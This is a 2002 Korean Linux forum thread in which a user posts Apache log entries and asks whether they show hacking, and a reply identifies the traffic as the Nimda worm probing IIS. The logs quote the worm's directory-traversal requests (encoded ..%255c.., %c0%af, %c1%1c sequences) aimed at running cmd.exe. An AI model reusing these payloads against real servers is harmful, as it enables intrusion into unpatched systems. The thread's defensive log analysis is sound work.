>> Read Reply from No. 44110 article  
RE: 이거 해킹인가요?

등록 2002-03-08 09:36:00     조회 1
이름 바다사랑    

		: 아파치 로그에 남은 겁니다. ip는 일단 안보이게 했습니다.
: RedHat 7.2에 아파치 깔았구요 Linux만 깔린 시스템입니다.
: 고수님들 이게 해킹하려는 건지 확인해 주십시오. 어떻게 해야 막을수도 있을까요?
:
: xxx.xxx.xx.xxx - - [08/Mar/2002:08:42:39 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
: xxx.xxx.xx.xxx - - [08/Mar/2002:08:42:40 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
: xxx.xxx.xx.xxx - - [08/Mar/2002:08:42:40 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
: xxx.xxx.xx.xxx - - [08/Mar/2002:08:42:41 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
: xxx.xxx.xx.xxx - - [08/Mar/2002:08:42:41 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 29
: 8 "-" "-" xxx.xxx.xx.xxx - - [08/Mar/2002:08:42:42 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/
: cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-" xxx.xxx.xx.xxx - - [08/Mar/2002:08:42:45 +0900] "GET /_mem_bin/..%255c../..%2
: 55c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-" xxx.xxx.xx.xxx - - [08/Mar/2002:08:42:46 +0900
: ] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
:  331 "-" "-" xxx.xxx.xx.xxx - - [08/Mar/2002:08:42:49 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HT
: TP/1.0" 404 297 "-" "-" xxx.xxx.xx.xxx - - [08/Mar/2002:08:42:50 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.ex
: e?/c+dir HTTP/1.0" 404 297 "-" "-" xxx.xxx.xx.xxx - - [08/Mar/2002:08:42:50 +0900] "GET /scripts/..%c0%af../winnt/syst
: em32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-" xxx.xxx.xx.xxx - - [08/Mar/2002:08:42:51 +0900] "GET /scripts/..%c1%9c..
: /winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-" xxx.xxx.xx.xxx - - [08/Mar/2002:08:42:52 +0900] "GET /scripts
: /..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-" xxx.xxx.xx.xxx - - [08/Mar/2002:08:42:52 +0900] "
: GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-" xxx.xxx.xx.xxx - - [08/Mar/2002:08:42:5
: 3 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-" xxx.xxx.xx.xxx - - [08/Ma
: r/2002:08:42:53 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-" --
: 서버 운영 공부좀 하려니 왜 이리 걸리는게 많아?
 ==>
안녕하세요 남상규님!
바다사랑입니다...
 위의 로그는 사람이 시도한 크랙이 아니구염,,
Windows군의 웹서버(IIS)를 괴롭히는
"Nimda"라 불리는 웜바이러스로 알고있습니다.....
UNIX계열의 웹서버(Apache)에는 그렇게 치명적인 타격을 주지않는걸로
알고있으니,,
그리 심히 염려를 하지 않으셔도 될것 같습니다..
 그래도 약간의 트래픽이 발생하는데,,
이걸 원천봉쇄하시려면,,,
넷필터의 확장기능을 활용하시길 권유드립니다...
 바다사랑 드림
 --
딸기우유..T^T
이름
암호


>> 관련글
44110 이거 해킹인가요?  남상규  2002.03.08  ....
  답장 RE: 이거 해킹인가요?  바다사랑  2002.03.08  ....
Register [ localhost 목록보기 윗글 아랫글
글쓰기
답장쓰기 수정 삭제
정규표현식 [ 상세 검색 ]
페이지로딩: [ 0.73 초 ] 작업시간: [ 0.29 초 ]

Copyleft 1999-2026 by JSBoard Open Project
Theme Designed by IDOO All right reserved
[TOP]

적수네 동네
+
| 적수네 동네
| 공부방
| 리눅스 잡지 서고
| LSN 소스
| 링크 모음
+---+
게시판
+
| 떠들어보세!
| 질문과 답변
| 새소식과 정보
| 1원짜리 팁?
| 대화방
+---+
칼럼?
+
| 세하 훔쳐보기
| Welcome2nite
| 혜진의 염장판
+---+
리눅스 상표권
+
| 반대 서명란
| 토론 게시판
+---+
GNU
+
| GNU 선언문
| GNU GPL
| GNU 미러 목록
+---+
프로젝트?
+
| 리눅스카운터
| RC5DES
| 실질헌법 제작
+---+
커널 소식
+
| 안정 버젼: 2.4.14
+---+
테마 선택
+
LSN 방송국?
+
| OFF AIR
+---+
회원
+
| 로그인
+---+
[ 적수네 동네 ] [ 리눅스 상표권 독점 반대 ] [ 한글 리눅스 문서 프로젝트 ] [ KrLine ] [ 사랑넷 ] [ Valid HTML 4.0! ] [ SlashDot ] [ Freshmeat ]
Copyleft (C) 1998-2001 Byeong-Chan Kim . License
TIME: 1791694352
System by WYZsoft, HDD by I.O.Linux, Mizi Research, Embryo, WOWLINUX, Domain by SarangNet, Network by KrLine.